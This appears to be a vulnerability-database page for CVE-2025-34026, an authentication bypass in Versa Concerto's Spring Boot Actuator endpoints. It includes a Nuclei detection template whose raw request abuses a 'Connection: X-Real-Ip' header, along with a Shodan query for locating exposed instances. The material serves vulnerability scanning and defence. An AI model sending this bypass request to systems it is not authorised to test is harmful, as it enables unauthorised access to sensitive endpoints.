Versa Concerto Actuator Endpoint - Authentication Bypass
CVE-2025-34026
Verified
Description
An authentication bypass vulnerability affected the Spring Boot Actuator endpoints in Versa Concerto due to improper handling of the X-Real-Ip header.Attackers could access restricted endpoints by omitting this header.The issue allowed unauthorized access to sensitive functionality, highlighting the need for proper header validation.
Severity
Critical
Exploit Probability
6%
Affected Product
concerto
Published Date
May 21, 2025
Template Author
iamnoooob, rootxharsh, parthmalhotra
+1
CVE-2025-34026.yaml
id: CVE-2025-34026
info:
name: Versa Concerto Actuator Endpoint - Authentication Bypass
author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
severity: critical
description: |
An authentication bypass vulnerability affected the Spring Boot Actuator endpoints in Versa Concerto due to improper handling of the X-Real-Ip header.Attackers could access restricted endpoints by omitting this header.The issue allowed unauthorized access to sensitive functionality, highlighting the need for proper header validation.
reference:
- https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce/
- https://security-portal.versa-networks.com/emailbulletins/6830f94328defa375486ff2e
- https://www.cve.org/CVERecord?id=CVE-2025-34026
classification:
epss-score: 0.06397
cpe: cpe:2.3:a:versa-networks:concerto:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: versa-networks
product: concerto
max-request: 1
shodan-query: http.favicon.hash:-534530225
tags: versa,concerto,actuator,auth-bypass,springboot,cve,cve2025
http:
- raw:
- |
GET /portalapi/actuator HTTP/1.1
Host: {{Hostname}}
Connection: X-Real-Ip
matchers-condition: and
matchers:
- type: word
part: body
words:
- heapdump
- type: word
part: header
words:
- EECP-CSRF-TOKEN
# digest: 490a00463044022100c1b63120b9b9db828d45c2544d84b5c2bf9b970cddf70e30f38ee447711d2cbb021f2741bc0bc1363db9656b797537b0ee0617c1f34798a613f7db560d6dcaac4d:922c64590222798bb761d5b6d8e72950